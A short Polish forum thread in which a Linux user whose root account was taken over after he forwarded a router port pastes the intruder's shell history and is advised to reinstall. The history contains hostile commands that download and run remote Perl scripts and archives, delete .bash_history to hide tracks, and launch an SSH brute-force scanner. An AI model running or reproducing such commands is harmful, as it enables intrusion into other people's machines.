[+] W

[kodama]

Witam.
Przedwczoraj bodajże zauważyłem, że próbując zalogować się na konto roota nie działa moje hasło (biedne swoją drogą - moja wina). No i z tego co mi dalej wynika porobił się ambaras: szybko podejrzałem sobie historię poleceń wydanych przez roota i:

Kod: Zaznacz cały

w
ls
ls -a
cd Quick/
ls
cat vuln.txt 
cd
cd /var
ls
cd log
ls
perl muie.txt
cd ..
ls
cd lib
perl muie.txt
cd ..
cd run
ls
cd ..
ls
cd lib
ls
cd mlocate/
ls
wget http://deyu.clan.su/muie.txt
nano muie.txt 
perl muie.txt
cd
w
cat .bash_history 
rm -rf .bash_history 
cd
ls
w
rm -rf Quick.mp3 
cd Quick/
ls
rm -rf vuln.txt 
./a 91
./start 46
cd
ls
w
ls
cd Quick/
ls
cd
cd .log
wget http://geox.clanteam.com/bounce.jpg;tar zxvf bounce.jpg;rm -rf bounce.jpg;cd .log
rm -rf xh
rm -rf xhide
rm -rf xhide.c
rm -rf xhidef
rm -rf xhided
rm -rf xhides
rm -rf test.pid
rm -rf psybnc.pid
./install
cd
ls 
ls -a
w
uname -a
cd Quick/
screen
ps -x
kill -9 3061
wget http://roby.do.am/sshbrute.tgz;tar zxvf sshbrute.tgz;cd sshbrute;chmod +x *
./scan-B 46.4

Tyle widać. Z tego wnioskuję, że zostało wrzucone badziewie sshbrute.tgz - jakiś skaner portów czy coś? Do tego jakieś psybnc, cokolwiek by to nie było. Wydaje mi się, że wszystko już po tym posprzątałem (przynajmniej tyle co widzę, w tej historii, że zostało grzebane). "Nieopatrznie" przekierowany port na ruterze i widzę, że od razu się cyrki dzieją.

[Yampress]

A skąd wiesz co robiły te skrypty!
Przeinstaluj system, jest już nie twój.

[kodama]

Zrobiłem tak jak radzisz, po co kombinować.